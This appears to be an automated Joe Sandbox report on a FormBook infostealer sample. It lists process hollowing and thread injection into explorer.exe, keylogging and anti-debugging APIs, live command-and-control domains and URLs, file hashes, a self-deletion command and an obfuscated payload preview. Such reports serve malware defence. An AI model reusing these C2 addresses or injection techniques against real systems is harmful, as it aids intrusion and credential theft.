Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_03AF0005 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_03AF0019 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_03AF007A mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00EE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F05CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 2_2_00409AB0 rdtsc

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 2_2_0040ACF0 LdrLoadDll,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F445D5 BlockInput,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EFA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EFA354 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EFA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 18.167.242.213 80
Source: C:\Windows\explorer.exe	Network Connect: 103.100.63.146 80
Source: C:\Windows\explorer.exe	Domain query: www.111lll.xyz
Source: C:\Windows\explorer.exe	Domain query: www.73129.vip

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\kmhbvf.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 120000

Queues an APC in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Thread register set: target process: 3452
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Thread register set: target process: 3452
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Thread register set: target process: 3452

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F31AC6 SendInput,keybd_event,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Process created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\kmhbvf.exe"

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F29369 LogonUserW,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00EE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F351E2 mouse_event,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F34F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Source: shedfam.exe, 00000000.00000002.258371717.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000000.244367658.0000000000F86000.00000002.00000001.01000000.00000004.sdmp, kmhbvf.exe, 00000002.00000000.249911083.0000000000F86000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorer.exe, 00000003.00000000.321880646.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.294317706.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.258322035.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerT7<=ge
Source: kmhbvf.exe, explorer.exe, 00000003.00000000.303545502.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.271730124.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.299459459.0000000006770000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.321880646.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.294317706.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.258322035.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.257495266.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.321537541.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CProgmanile
Source: explorer.exe, 00000003.00000000.321880646.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.294317706.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.258322035.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00EF885B cpuid

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F10030 GetLocalTime,__swprintf,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F0416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F10722 GetUserNameW,

Source: C:\Users\user\Desktop\shedfam.exe

Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: kmhbvf.exe	Binary or memory string: WIN_81
Source: kmhbvf.exe	Binary or memory string: WIN_XP
Source: kmhbvf.exe	Binary or memory string: WIN_XPe
Source: kmhbvf.exe	Binary or memory string: WIN_VISTA
Source: kmhbvf.exe	Binary or memory string: WIN_7
Source: kmhbvf.exe	Binary or memory string: WIN_8
Source: kmhbvf.exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F4696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F46E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
2 Valid Accounts	12 Native API	2 Valid Accounts	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 Credential API Hooking	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	4 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	2 Valid Accounts	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Credential API Hooking	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	21 Access Token Manipulation	3 Obfuscated Files or Information	Security Account Manager	1 System Network Connections Discovery	SMB/Windows Admin Shares	21 Input Capture	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	512 Process Injection	1 Software Packing	NTDS	2 File and Directory Discovery	Distributed Component Object Model	2 Clipboard Data	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Rootkit	LSA Secrets	115 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Valid Accounts	Cached Domain Credentials	151 Security Software Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	2 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	3 Process Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	512 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	1 System Owner/User Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	1 Remote System Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Rename System Utilities	Keylogging	1 System Network Configuration Discovery	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\kmhbvf.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\kmhbvf.exe	2%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.0.kmhbvf.exe.400000.5.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.2.shedfam.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491	Download File
1.2.kmhbvf.exe.3b00000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
2.2.kmhbvf.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.0.shedfam.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491	Download File

Domains

Source	Detection	Scanner	Label	Link
www.autonomaat.com	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.111lll.xyz/sk19/?6lu=u4lk2PnXcU0u2VBKyLJoTfxxVYVxHm+9jz8FSZNawyXEtvRDPmLLRjoruE33sVgH1sLP&u4=pVhTtd7pjTy	0%	Avira URL Cloud	safe
http://www.73129.vip/sk19/?6lu=QEAmWZfTRhzoING4/pUtXBuIHlMFTiZNz3G0bLc7Fgt63bTZUMXUq+W3t0nrgTJvEVvm&u4=pVhTtd7pjTy	0%	Avira URL Cloud	safe
www.justbeand.com/sk19/	0%	Avira URL Cloud	safe
http://gcsahrz23.xyz/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fbcuj92a.n.sktcks.com	18.167.242.213	true	true		unknown
www.autonomaat.com	54.67.42.145	true	false	1%, Virustotal, Browse	unknown
www.73129.vip	103.100.63.146	true	true		unknown
www.111lll.xyz	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.111lll.xyz/sk19/?6lu=u4lk2PnXcU0u2VBKyLJoTfxxVYVxHm+9jz8FSZNawyXEtvRDPmLLRjoruE33sVgH1sLP&u4=pVhTtd7pjTy	true	Avira URL Cloud: safe	unknown
www.justbeand.com/sk19/	true	Avira URL Cloud: safe	low
http://www.73129.vip/sk19/?6lu=QEAmWZfTRhzoING4/pUtXBuIHlMFTiZNz3G0bLc7Fgt63bTZUMXUq+W3t0nrgTJvEVvm&u4=pVhTtd7pjTy	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmp, kmhbvf.exe, 00000002.00000000.252060134.0000000000F99000.00000002.00000001.01000000.00000004.sdmp, explorer.exe, 00000003.00000000.294072289.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.305847313.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.257903286.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.333339547.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.280708898.000000000F276000.00000004.00000001.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	false		high
http://nsis.sf.net/NSIS_Error	shedfam.exe	false		high
http://nsis.sf.net/NSIS_ErrorError	shedfam.exe	false		high
http://gcsahrz23.xyz/	NETSTAT.EXE, 0000000D.00000002.518369394.0000000003D9F000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/autoit3/	shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
18.167.242.213	fbcuj92a.n.sktcks.com	United States		16509	AMAZON-02US	true
103.100.63.146	www.73129.vip	China		136970	YISUCLOUDLTD-AS-APYISUCLOUDLTDHK	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	756041
Start date and time:	2022-11-29 15:11:10 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 5s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	shedfam.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@9/5@3/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 30.3% (good quality ratio 28.2%) Quality average: 70.2% Quality standard deviation: 31.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Process:	C:\Users\user\Desktop\shedfam.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	66710
Entropy (8bit):	3.5882360502901314
Encrypted:	false
SSDEEP:	384:QvCbSUvegVHfqXqgdbn2irCAnbYv853oADrWdREGu/g74s65jniENIVfpWJ769Vs:tLriH9nEv8yAGo9rsm+VhFDs
MD5:	431EB080C0121588DF787ADE07921631
SHA1:	51225D617EB675000CD546296200A3394BE6E3E5
SHA-256:	E2D19473BB19AD0753170CBEB884714EC463E9F7836876F0174509FED54DFB6B
SHA-512:	C7CF3F965FE741D6D98E06BAE9EE12CEADF6FF93574E03DBC2B9EB9336B4A9C23285B3DC3BBCBCD9D8B21C6E91BB92FB65B2995205AB8AAA5794FDA3FC614136
Malicious:	false
Reputation:	low
Preview:	0xe9220FF4500BBBVFDA580462000064a13000FF4500BBBVFDA5804600008FF4500BBBVFDA58046b4FF4500BBBVFDA580460FF4500BBBVFDA580460c8b40FF4500BBBVFDA580460c8b008FF4500BBBVFDA58046b008FF4500BBBVFDA58046b4018FF4500BBBVFDA58046c35FF4500BBBVFDA580465FF4500BBBVFDA580468becFF4500BBBVFDA5804664a13FF4500BBBVFDA580460FF4500BBBVFDA5804600000056578bFF4500BBBVFDA58046400c8b7FF4500BBBVFDA5804680c8bf7ff7508FF4500BBBVFDA58046ff7FF4500BBBVFDA580466FF4500BBBVFDA580463FF4500BBBVFDA580460e81FF4500BBBVFDA58046201000085c07FF4500BBBVFDA5804640a8b363bf775FF4500BBBVFDA58046eb33c0ebFF4500BBBVFDA58046038b46285f5eFF4500BBBVFDA580465dFF4500BBBVFDA58046c2040FF4500BBBVFDA580460FF4500BBBVFDA58046558bec568b75FF4500BBBVFDA5804608ba26FF4500BBBVFDA580462FF4500BBBVFDA58046300005FF4500BBBVFDA580467eb0eFF4500BBBVFDA580468FF4500BBBVFDA58046bFF4500BBBVFDA58046caFF4500BBBVFDA58046dFF4500BBBVFDA580461e8c1FF4500BBBVFDA58046e10FF4500BBBVFDA5804674FF4500BBBVFDA580466FF4500BBBVFDA580460bFF4500BBBVFDA58046c803cf03dFF4500BBBVFDA5804610FF4500BBB

C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Download File

Process:	C:\Users\user\Desktop\shedfam.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.620131693023677
Encrypted:	false
SSDEEP:	12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
MD5:	C56B5F0201A3B3DE53E561FE76912BFD
SHA1:	2A4062E10A5DE813F5688221DBEB3F3FF33EB417
SHA-256:	237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
SHA-512:	195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 2%
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nse13E9.tmp

Download File

Process:	C:\Users\user\Desktop\shedfam.exe
File Type:	data
Category:	dropped
Size (bytes):	1161271
Entropy (8bit):	7.006804288931609
Encrypted:	false
SSDEEP:	12288:ldtfUML9HQFpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawVx:lLsNT3E53Myyzl0hMf1tr7Caw8M0A
MD5:	5FF42BDDBCC182E0FCC90781FAD2728A
SHA1:	EAD63E8B5973CCE5218306D11BF622BCBDFE2A7F
SHA-256:	A003F5F08AAE6F3DF16215ED1EC97315A7DD79D4B3488F6D8114189B16ABB176
SHA-512:	0CF8E7376574478DE2C161CE96B2EBDC27996FE5E35EDA137579F915831EB5A101A4753A789BF35CBD9A20B6AAA50B8432F8465D60F32843D49A174AA74C2318
Malicious:	false
Reputation:	low
Preview:	........,...................I...............................................................................................................................................................................................................................................................J...............F...j...........................................................................................................................................#...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\piqsiyngg.yfg

Download File

Process:	C:\Users\user\Desktop\shedfam.exe
File Type:	data
Category:	dropped
Size (bytes):	189440
Entropy (8bit):	7.991287376939625
Encrypted:	true
SSDEEP:	3072:WKYGVE/xY13tv+Fm7mNamHwvyWiIwl0dxFtMO7i0b5WAL7m8GPRfZiMBV:+GVdtyLad0lMLb5bjTMBV
MD5:	DC7CD66F3A1B920FE91A5550F1B95608
SHA1:	C72EB7822DA4656A6F0A391847FE8A76564572E3
SHA-256:	DB73C93C0D9FC5B23B95D9CB5D8BD402914999BA59B3D6C90B4DAC8E7DC302E6
SHA-512:	3C030A853C7C345A3C93E53D015C51A91986AE4DB4AB13E4730C9FFB2EAAFBF62C65A5D11FBA21B810A6CDAAB3CAEBFE48CE36D960AF54294CB55D7F108101FE
Malicious:	false
